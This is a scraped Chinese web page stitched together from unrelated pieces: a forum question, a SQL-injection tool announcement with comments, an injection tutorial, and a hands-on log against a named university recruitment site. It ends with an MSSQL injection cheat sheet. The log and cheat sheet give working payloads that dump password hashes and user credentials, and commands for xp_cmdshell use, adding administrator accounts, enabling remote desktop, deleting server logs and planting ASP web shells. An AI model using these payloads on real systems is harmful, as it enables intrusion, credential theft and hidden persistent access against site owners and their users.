用SQL注入式攻击攻击工具包找不到网站的SQL注入式攻击点怎么回事?
点击联系发帖人
时间:2012-06-02 19:21
SQL注入网站入侵攻击实例_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
SQL注入网站入侵攻击实例
上传于||暂无简介
阅读已结束,如果下载本文需要使用2下载券
想免费下载本文?
你可能喜欢不知道网站是否被SQL注入?该如何防范?跪求高手相助
[问题点数:100分]
不知道网站是否被SQL注入?该如何防范?跪求高手相助
[问题点数:100分]
不显示删除回复
显示所有回复
显示星级回复
显示得分回复
只显示楼主
2010年2月 Web 开发大版内专家分月排行榜第二
2010年3月 Web 开发大版内专家分月排行榜第三
2013年10月 Web 开发大版内专家分月排行榜第三
本帖子已过去太久远了,不再提供回复功能。国产SQL注入漏洞测试工具 – 超级SQL注入工具(SSQLInjection) -
| 关注黑客与极客
国产SQL注入漏洞测试工具 – 超级SQL注入工具(SSQLInjection)
共343370人围观
,发现 88 个不明物体
此工具为本人对C#、Socket及HTTP协议、SQL注入进行深入研究后,闲暇时间做的一款SQL注入工具。不说秒SQLMap,直接秒杀什么webcruiser、Safe3SI、pangolin、havij、DSQLTools、明小子等,今后可以扔掉这些过时的工具了。
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。
目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。
采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。
支持盲注环境获取世界各国语言数据,直接秒杀各种注入工具在盲注环境下无法支持中文等多字节编码的数据。
1.支持任意地点出现的任意SQL注入
2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。
3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。
4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
程序运行需要安装. Net Framework 2.0。运行环境XP、Win7,Win8环境已测试,其他环境请自测。
1篇文章等级:1级
这家伙太懒,还未填写个人描述!
楼主博客所说“史上最牛”,我就不乐意了!我可是94P7大牛,信不信等会抽根烟时间就能写一个秒杀你的seay史上全宇宙最屌注入工具,支持本地txt文本注入
请不要在炫耀自己的同时侮辱别人!没有前人的经验你能写出来? 最讨厌这种把自己的优越感建立在贬低别人的基础上的人
你们都太young我比较关心这篇文章能拿到200元稿费吗?
学习的小白
看完文章感觉很牛逼,试了一下感觉很呵呵:功能方面:“类别识别”这是这类工具最基本的功能,如果这个不做,就不要说是SQL注入工具了。界面方面:1.“导出配置”点“取消”竟然是“导出完毕”;2.程序运行起来,那个日志Textbox哗哗的跑,然后程序整个form就死了。
这年头 还在自己的软件里加QQ加网址 想想就知道是不是好程序了 我也是醉了
必须您当前尚未登录。
必须(保密)
这家伙太懒,还未填写个人描述!
分享每日精选文章& & & & 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL&Injection,即SQL注入。& & SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。& & 但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与&菜鸟&的根本区别。& & 根据国情,国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧,PHP注入的文章由NB联盟的另一位朋友zwell撰写,希望对安全工作者和程序员都有用处。了解&ASP注入的朋友也请不要跳过入门篇,因为部分人对注入的基本判断方法还存在误区。大家准备好了吗?Let's&Go...& & 入门篇& & 如果你以前没试过SQL注入的话,那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好&HTTP&错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP&500服务器错误,不能获得更多的提示信息。& & 注入工具介绍:& & 啊D,明小子,wed+wis,冰舞等。& & 这些工具常用的是明小子和啊D,对网站进行扫描注入漏洞,要下载最新的工具。& & 对于工具的使用,一定要熟悉!!。。& & 第一节、SQL注入原理& & 以下我们从一个网站开始(注:本文发表前已征得该站站长同意,大部分都是真实数据)。& & 在网站首页上,有名为&IE不能打开新窗口的多种解决方法&的链接,地址为:/showdetail.asp?id=49,我们在这个地址后面加上单引号&,服务器会返回下面的错误提示:& & Microsoft&JET&Database&Engine&错误&'80040e14'& & 字符串的语法错误&在查询表达式&'ID=49''&中。& & /showdetail.asp,行8& & 从这个错误提示我们能看出下面几点:& & 1.&网站使用的是Access数据库,通过JET引擎连接数据库,而不是通过ODBC。(注:熟悉网站的开发和哪些网站通常使用什么样的数据库。不同的网站连接数据库的方式也要了解。对数据库的知识也要有一定的理解)& & 2.&程序没有判断客户端提交的数据是否符合程序要求。& & 3.&该SQL语句所查询的表中有一名为ID的字段。& & 从上面的例子我们可以知道,SQL注入的原理,就是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想到得到的资料。& & 第二节、判断能否进行SQL注入& & 看完第一节,有一些人会觉得:我也是经常这样测试能否注入的,这不是很简单吗?& & 其实,这并不是最好的方法,为什么呢?& & 首先,不一定每台服务器的IIS都返回具体错误提示给客户端,如果程序中加了cint(参数)之类语句的话,SQL注入是不会成功的,但服务器同样会报错,具体提示信息为处理&URL&时服务器上出错。请和系统管理员联络。& & 其次,部分对SQL注入有一点了解的程序员,认为只要把单引号过滤掉就安全了,这种情况不为少数,如果你用单引号测试,是测不到注入点的& & 那么,什么样的测试方法才是比较准确呢?答案如下:& & ①&/showdetail.asp?id=49& & ②&/showdetail.asp?id=49&;and&1=1& & ③&/showdetail.asp?id=49&;and&1=2& & 这就是经典的1=1、1=2测试法了,怎么判断呢?看看上面三个网址返回的结果就知道了:& & 可以注入的表现:& & ①&正常显示(这是必然的,不然就是程序有错误了)& & ②&正常显示,内容基本与①相同& & ③&提示BOF或EOF(程序没做任何判断时)、或提示找不到记录(判断了rs.eof时)、或显示内容为空(程序加了on&error&resume&next)& & 不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。& & 当然,这只是传入参数是数字型的时候用的判断方法,实际应用的时候会有字符型和搜索型参数,我将在中级篇的&SQL注入一般步骤&再做分析。& & 第三节、判断数据库类型及注入方法& & 不同的数据库的函数、注入方法都是有差异的,所以在注入之前,我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer,网上超过99%的网站都是其中之一。& & 怎么让程序告诉你它使用的什么数据库呢?来看看:& & SQLServer有一些系统变量,如果服务器IIS提示没关闭,并且SQLServer返回错误提示的话,那可以直接从出错信息获取,方法如下:& & /showdetail.asp?id=49;and&user>0& & 这句语句很简单,但却包含了SQLServer特有注入方法的精髓,我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义:首先,前面的语句是正常的,重点在and&user>0,我们知道,user是SQLServer的一个内置变量,它的值是当前连接的用户名,类型为nvarchar。拿一个&nvarchar的值跟int的数0比较,系统会先试图将nvarchar的值转成int型,当然,转的过程中肯定会出错,SQLServer的出错提示是:将nvarchar值&&abc&&转换数据类型为&int&的列时发生语法错误,呵呵,abc正是变量user的值,这样,不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里,大家会看到很多用这种方法的语句。& & 顺便说几句,众所周知,SQLServer的用户sa是个等同Adminstrators权限的角色,拿到了sa权限,几乎肯定可以拿到主机的&Administrator了。上面的方法可以很方便的测试出是否是用sa登录,要注意的是:如果是sa登录,提示是将&dbo&转换成int的列发生错误,而不是&sa&。& & 如果服务器IIS不允许返回错误提示,那怎么判断数据库类型呢?我们可以从Access和SQLServer和区别入手,Access和&SQLServer都有自己的系统表,比如存放数据库中所有对象的表,Access是在系统表[msysobjects]中,但在Web环境下读该表会提示&没有权限&,SQLServer是在表[sysobjects]中,在Web环境下可正常读取。& & 在确认可以注入的情况下,使用下面的语句:& & /showdetail.asp?id=49;and&(select&count(*)&from&sysobjects)>0& & /showdetail.asp?id=49;and&(select&count(*)&from&msysobjects)>0& & 如果数据库是SQLServer,那么第一个网址的页面与原页面/showdetail.asp?id=&49是大致相同的;而第二个网址,由于找不到表msysobjects,会提示出错,就算程序有容错处理,页面也与原页面完全不同。& & 如果数据库用的是Access,那么情况就有所不同,第一个网址的页面与原页面完全不同;第二个网址,则视乎数据库设置是否允许读该系统表,一般来说是不允许的,所以与原网址也是完全不同。大多数情况下,用第一个网址就可以得知系统所用的数据库类型,第二个网址只作为开启IIS错误提示时的验证。& & 进阶篇& & 在入门篇,我们学会了SQL注入的判断方法,但真正要拿到网站的保密内容,是远远不够的。接下来,我们就继续学习如何从数据库中获取想要获得的内容,首先,我们先看看SQL注入的一般步骤:& & 第一节、SQL注入的一般步骤& & 首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。& & 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:& & (A)&ID=49&这类注入的参数是数字型,SQL语句原貌大致如下:& & Select&*&from&表名&where&字段=49& & 注入的参数为ID=49&And&[查询条件],即是生成语句:& & Select&*&from&表名&where&字段=49&And&[查询条件]& & (B)&Class=连续剧&这类注入的参数是字符型,SQL语句原貌大致概如下:& & Select&*&from&表名&where&字段=&连续剧&& & 注入的参数为Class=连续剧&&and&[查询条件]&and&&&=&&,即是生成语句:& & Select&*&from&表名&where&字段=&连续剧&&and&[查询条件]&and&&&=&&& & &&搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:& & Select&*&from&表名&where&字段like&&%关键字%&& & 注入的参数为keyword=&&and&[查询条件]&and&&%25&=&,&即是生成语句:& & Select&*&from&表名&where字段like&&%&&and&[查询条件]&and&&%&=&%&& & 接着,将查询条件替换成SQL语句,猜解表名,例如:& & ID=49&And&(Select&Count(*)&from&Admin)>=0& & 如果页面就与ID=49的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。& & 表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。& & 有人会说:这里有一些偶然的成分,如果表名起得很复杂没规律的,那根本就没得玩下去了。说得很对,这世界根本就不存在100%成功的黑客技术,苍蝇不叮无缝的蛋,无论多技术多高深的黑客,都是因为别人的程序写得不严密或使用者保密意识不够,才有得下手。& & ​
声明:该文章系网友上传分享,此内容仅代表网友个人经验或观点,不代表本网站立场和观点;若未进行原创声明,则表明该文章系转载自互联网;若该文章内容涉嫌侵权,请及时向
上一篇:下一篇:
相关经验教程
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益&>&&>& > 正文
搜索型注入
检验:&江西农大招生就业网&
关键字%' and 1=1 and '%'=' &返回正常
关键字%' and 1=2 and '%'=' &返回错误
%25%25%25%27%09and%091=1%23 & %09代替空格法
2找出keyword
post方式得抓抱:(变量放在最后面,就可以直接放工具跑)
http://zhaojiu./Web_News/Search.asp?style=3&keyWord=江西
冬%' order by 1-- and '%'=' &或: & 冬%' order by 1 and '%'='
& &爆当前数据库用户名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7%20and%20user=0-- &&
& /Web_News/Search.asp?style=3&keyWord=江西'and%20user=0 & %BD%AD%CE%F7=江西的url编码
& & & & & & & & & & & & &-- ----- 字符型注意有个 ' 号 & 下面同理-----
& 魔术引号开关magic_quotes_gpc
& & &这个用pangolin基本上都可以猜出来,其实我们完全可以在注入点后加 &and '1'='1'/* &返回正常表明GPC关,否则表明GPC开
& 原理分析: 当GPC开启时,会对' 进行转义,使其变成 \'
& 爆当前数据库版本:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20@@VERSION)%3E0--
& &爆当前数据库名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20db_name()%3E0--
& 本地服务名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20@@servername%3E0-- &pangolin工具得出:JXAU-H1LI7JSV2I
& *****网页返回:[Microsoft][ODBC SQL Server Driver][SQL Server]在将 nvarchar 值 'JXAU-H1LI7JSV2I' 转换成数据类型 int 时失败。
& 服务器名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20host_name()=0--&
&数据库系统用户名:(sa)
&/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20system_user%3E0--&
&在将 nvarchar 值 'sa' 转换成数据类型 int 时失败
---------------------------------------------------------------------
&判断权限:
&SA权限: &/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20cast(is_srvrolemember(0xas%20nvarchar(1))%2bchar(124)=1%20and%20'1'='1
&DBO权限: /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20cast(is_member(0x6fas%20nvarchar(1))%2bchar(124)=1%20and%20'1'='1
-------------------------------------------------------------
爆数据库名:
& 第一个:/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--
& 第二个:/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%202%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--
& & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & ------------ 第二个数据库 & & & ----------- & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &&
爆SA的hash值:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bisnull(master.dbo.fn_varbintohexstr([password_hash]),char(32))%20from(select%20top%20%201%20[name],[password_hash]%20from%20[master].[sys].[sql_logins]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--&
猜表的数量:
/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[zhaojiuchu].[sys].[all_objects]%20where%20type=char(85))%3E0-- & &type=char(85)=type=U
爆第一个表名:
& &/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from(select%20top%201%20object_id,name%20from%20[zhaojiuchu].[sys].[all_objects]%20where%20type=char(85)%20order%20by%20object_id)%20t%20order%20by%20object_id%20desc)%3E0--
爆第二个表名:&
&/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from(select%20top%202%20object_id,name%20from%20[zhaojiuchu].[sys].[all_objects]%20where%20type=char(85)%20order%20by%20object_id)%20t%20order%20by%20object_id%20desc)%3E0--&
爆表的id:
/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast([id]%20as%20nvarchar(20))%2bchar(94)%20%20from%20[zhaojiuchu].[sys].[sysobjects]%20where%20name=0x5a)%3E0--
猜列的数量:
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20[zhaojiuchu]..[users]%20where%201=1)%3E0--
/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[zhaojiuchu].[sys].[all_columns]%20where%20object_id=E0--
& & &varchar 值 '5^' 转换成数据类型 int 时失败
第一个列名:
%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from%20(select%20top%201%20column_id,name%20from%20[zhaojiuchu].[sys].[all_columns]%20where%20object_id=order%20by%20column_id)%20t%20order%20by%20column_id%20desc)%3E0--&
第二个列名:
Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from%20(select%20top%202%20column_id,name%20from%20[zhaojiuchu].[sys].[all_columns]%20where%20object_id=order%20by%20column_id)%20t%20order%20by%20column_id%20desc)%3E0--
& 记录条数:
& & & & & & & & & & & & & & & & & & & & & & & & &&
& Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(8000))%2bchar(94)%20from%20[zhaojiuchu]..[users]%20where%201=1)%3E0--
& 爆用户名:
& Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(username%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0%20and%20'1'='1 & 爆不出来:
& Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(username%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0-- & & & & & & & &返回结果
& & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &username或password & & & & & & & & & & & & & & & & & & & & & &第一条记录的
&Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(password%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0%20and%20'1'='1
&Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(password%20as%20varchar)%2bchar(94)%20from%20(select%20top%201%20[username],[password]%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20t%20where%201=1%20order%20by%20[username]%20desc%20)%3E0--
----------------------------------pangolin3.0版本可以成功爆出用户和密码----------------------------------------------
&爆第一条记录的用户名和密码:
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%3E0--
爆出一条记录用用户名和密码(除第一条用户名和密码:) & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & not除 & & & & & & & & &第一条 & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & 按姓名排序
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20order%20by%20[username])%3E0--
同上:除第二条记录的
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20[zhaojiuchu]..[users]%20where%201=1%20order%20by%20[username])%20order%20by%20[username])%3E0--&
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%200%20username%20from%20zhaojiuchu..users%20where%201=1%20group%20by%20username))%3E0-- & 第一条,top%200&
/Web_News/Search.asp?style=3&keyword=%BD%AD%CE%F7'%20and%20(select%20top%201%20isnull(cast([username]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]%20as%20nvarchar(4000)),char(32))%20from%20[zhaojiuchu]..[users]%20where%201=1%20and%20username%20not%20in%20(select%20top%201%20username%20from%20zhaojiuchu..users%20where%201=1%20group%20by%20username))%3E0-- & 第二条:
----------------------------------------------------------------------------------------------------------------------------
& & & & & & & & & & & &mssql手工注入语句
=============================================================================
and exists (select * from sysobjects) & & & & & & & & & //判断是否是MSSQL
and 1=convert(int,@@version) 或 &1=(select @@version) & //判断数据库版本
;declare @d int & & & & & & & & & & & & & & & & & & & & //是否支持多行
and (select count(1) from [sysobjects])&=0 & & & & & & //是否支持子查询
and user&0 & & & & & & & & & & & & & & & & & & & & & &//获取当前数据库用户名
and db_name&0 & & & & & & & & & & & & & & & & & & & &//获取当前数据库名称
and 1=convert(int,db_name()) &或 &1=(select db_name()) &//当前数据库名
and 1=(select @@servername) & & & & & & & & & & & & & &//本地服务名
and 1=(select IS_SRVROLEMEMBER('sysadmin')) & & & & & //判断是否是系统管理员
and 1=(select is_srvrolemember('db_owner') & & & & & &//判断是否是库权限
and 1=(select is_srvrolemember('public') & & & & & & //判断是否为Public权限
having 1=1 -- & & & & & & & & & & & & & & & & & & & &//爆取当前数据库信息
group by 表名.列名 having 1=1 -- & & & & & & & //爆取其他表名,由上句语句得来
group by 表名.列名1,表名.列名 having 1=1 -- & & & & &//继续爆当前表中的其他列名
and (select top 1 name from(select top N id,name from sysobjects where
& & &xtype='U[或char(85)]' and status&0) order by id desc)&1
& & & & & & & & & & & & & & & //N从1开始递增即可爆当前库中所有表名,按ID降序排列
或 and (select top 1 name from sysobjects where xtype='U' and name not in
& & & (select top N name from sysobjects where xtype='u'))&1 & //同上
and (select top 1 name from master.dbo.sysdatabases order by dbid)&1
& & & & & & & & & & & & & & & & & & & & & & & & & & & //跨库查询,爆第一个
and (select top 1 name from master.dbo.sysdatabases where name not in
& & & &(select top N name from master.dbo.sysdatabases order by dbid))&1
& & & & & & & & & & & & & & & & & & & & & & & & & & &//跨库查询,N从1开始递增
and (select top 1 col_name(object_id('表名'),N)from sysobjects)&1
& & & & & & & & & & & & & & & & & & & & & & //爆指定表中任意列名,N从1开始递增
& & & &[扩展存储]
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND
& & & & name='xp_cmdshell') & & & & & & & & & & & //判断xp_cmdshell是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where
& & & & name= 'xp_regread') & & & & & &//查看xp_regread扩展存储过程是已被删除
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll' & & & //恢复xp_cmdshell
;exec sp_addextendedproc &xp_cmdshell&,'c:\xplog70.dll& &//自定义恢复路径
;exec sp_dropextendedproc 'xp_cmdshell' & & & & & & & & &//删除xp_cmdshell
;exec master..xp_cmdshell 'dir c:\' & & & & & & & & & & //查看服务器C盘目录
添加和删除一个SA权限的数据库用户hakz:(需要SA权限)
exec master.dbo.sp_addlogin hakz,password
exec master.dbo.sp_addsrvrolemember hakz,sysadmin
停掉或激活某个服务:(需要SA权限)
;exec master..xp_servicecontrol 'stop','schedule' & & & & & & //规则服务
;exec master..xp_servicecontrol 'start','schedule'
;exec master..xp_servicecontrol 'start', 'server' & & & & &//启动SERVER服务
获取WEB路径:
①利用xp_cmdshell搜索:
;exec master..xp_cmdshell 'dir /s d:/index.asp'
②利用IIS接口获得网站根目录:
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/2/root
③读取注册表:(Public 即可)
exec master.dbo.xp_regread
HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\sERVICES\W3SVC\Paramenters\VirtualRoots\&&/'
④利用OLE控件中的SP_OAMETHOD函数:
;declare @shell int
;exec master..SP_OAMETHOD 'wscript.shell',@shell out
;exec master..SP_OAMETHOD @shell,'run',null,'cmd.exe/c dir /s
& d:/index.asp &c:/log.txt'
⑤利用xp_dirtree列目录:(Public 即可)
& 建立临时表:;CREATE TABLE temp([id] INT IDENTITY (1,1) NOT NULL,
& & & & & & [name][nvarchar](300) NOT NULL,[depth][int] NOT NULL,
& & & & & & [isfile][nvachar](50) NULL);
& & & & & & insert into temp exec master..xp_dirtree &d:/&,1,1
&读取表中数据: and (select name from temp where id=N)&1 &N从1开始递增
&删除临时表: & ;--检测SP_OAcreate是否存在:
and 1=(SELECT count(*)FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
利用SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC
& &SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user
& & hakz hakz /add'
设置虚拟目录E为可读:
;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
& & @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs &a
& & w3svc/1/ROOT/e +browse'利用xp_cmdshell添加用户:(需要SA权限)
;exec master.dbo.xp_cmdshell 'net user hakz hakz /add'
;exec master.dbo.xp_cmdshell 'net localgroup administrators hakz /add'DOS下开 并修改端口号:
sc config termservice start= auto
net start termservice
reg add &HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& & Server& /v fDenyTSConnections /t REG_DWORD /d 0x0 /f & & //允许外部联接
reg add &HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& & Server\WinStations\RDP-Tcp& /v PortNumber /t REG_DWORD & //改端口到80开启数据库的远程连接:
①;select * from OPENROWSET
& &('SQLOLEDB','server=uid=pwd=pass',&select * from table&)
②;select * from OPENROWSET
& &('SQLOLEDB', 'uid=pwd=Network=DBMSSOCN;Address=1.2.3.4,1433;',
& & &'select * from table')
删除日志记录:
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5
& & & \ex100401.log &c:\temp.txt'
替换日志记录:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5
\ex090404.log c:\winnt\system32\logfiles\w3svc5\ex100401.log &c:\temp.txt'
差异备份语句:
①完整备份一次:
& ;backup database 库名 to disk=&c:\hakz.bak&;--
②创建表并插入数据:
& ;create table [dbo].[dtest]([cmd][image]);
& ;insert into dtest(cmd) values
& & (0x3C9253E);--
③差异备份:
& ;backup database 库名 to disk=&WEB路径\z.asp& with DIFFERENTIAL,FORMAT;--
LOG备份语句:
;alter database null set RECOVERY FULL -- & & & & & //激活数据库为还原模式
;create table cmd (a image)&-
;backup log null to disk=&c:\cmd& with int --
;insrt into cmd(a) values
& & (0x3C9253E) --
;backup log null to disk=&备份路径'&
有时候可能一句话备份不能成功,可以多试试以下几个版本:
&%%25Execute(request(&hakz&))%%25&
&%Execute(request(&hakz&))%&
%&&%execute request(&hakz&)%&&%
&script language=VBscript runat=server&execute request(&hakz&)&/script&
&%25Execute(request(&hakz&))%25&
如果备份的数据库名里面有特殊符号,要用[]包含起来.
&沙盒模式提权:(需要SA权限)
&当是SA权限但是xp_cmdshell被删除或xplog70.dll无法恢复时适用
&①打开沙盒模式
&;EXEC master.dbo.xp_regwrite
&&HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
②利用默认
&;Select * From
& &OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
& & shell(&net user hakz hakz /add&)');
& & & & &MSSQL手工注入语句常用的大概就这么多了,有些比较偏僻的就没有收录了,不过以后要有用时我还是会及时地把它们添加进来的 ~O(&_&)O~
===================================================================================================
